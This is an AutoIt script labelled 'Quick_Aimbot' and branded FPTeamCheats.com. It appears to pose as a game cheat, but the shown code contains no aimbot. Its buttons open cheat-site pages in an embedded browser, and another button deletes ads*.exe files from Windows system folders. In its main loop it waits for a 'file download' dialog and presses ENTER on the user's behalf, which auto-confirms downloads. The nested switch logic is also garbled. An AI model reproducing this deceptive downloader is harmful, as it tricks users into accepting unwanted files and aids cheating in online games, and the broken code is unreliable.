#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#include <IE.au3>
_IEErrorHandlerRegister()
$oIE = _IECreateEmbedded()
GUICreate("Quick_Aimbot", 260, 400, -1, -1, _
$WS_OVERLAPPEDWINDOW + $WS_VISIBLE + $WS_CLIPSIBLINGS + $WS_CLIPCHILDREN)
$GUIActiveX = GUICtrlCreateObj($oIE, 5, 5, 252, 294)
GUICtrlSetResizing(-1, 2 + 4 + 32 + 64)
$GUI_Button_one = GUICtrlCreateButton("53%", 32, 302, 90, 30)
$GUI_Button_too = GUICtrlCreateButton("102%", 132, 302, 90, 30)
$GUI_Button_ads = GUICtrlCreateButton("Удалить ADS", 82, 342, 90, 30)
GUICtrlCreateLabel("FPTeamCheats.com", 82, 382, 100, 16)
GUISetState()
_IENavigate($oIE, "http://crossteam.ru")
While 1
Switch GUIGetMsg()
Case $GUI_EVENT_CLOSE
ExitLoop
Case $GUI_Button_one
_IENavigate($oIE, "http://aimbotcf.net/license.html")
Case $GUI_Button_too
_IENavigate($oIE, "http://aimbotcf.net/successfully.html")
$nMsg=GuiGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $GUI_Button_ads
ProcessClose ( "ads4.exe" )
Sleep (100)
FileDelete ( "C:\Windows\System32\ads4.exe" )
ProcessClose ( "ads.exe" )
Sleep (100)
FileDelete ( "C:\Windows\ads.exe" )
ProcessClose ( "ads2.exe" )
Sleep (100)
FileDelete ( "C:\Windows\ads2.exe" )
ProcessClose ( "ads3.exe" )
Sleep (100)
FileDelete ( "C:\Windows\ads3.exe" )
ProcessClose ( "ads4.exe" )
Sleep (100)
FileDelete ( "C:\Windows\ads4.exe" )
MsgBox ( 0, "Del ADS", "Удалено успешно!" )
EndSwitch
WinClose ("http://html.usagc.org/?afk=AdNCLeng&sp= - Register the DV Green Card lottery - USAGC Organizati - Windows Internet Explorer")
WinClose ("Auto Game Online - Windows Internet Explorer")
WinClose ("Auto Game Online - Windows Internet Explorer")
WinWaitActive ( "Загрузка файла" )
Send ( "{ENTER}" )
EndSwitch
WEnd
GUIDelete()
Exit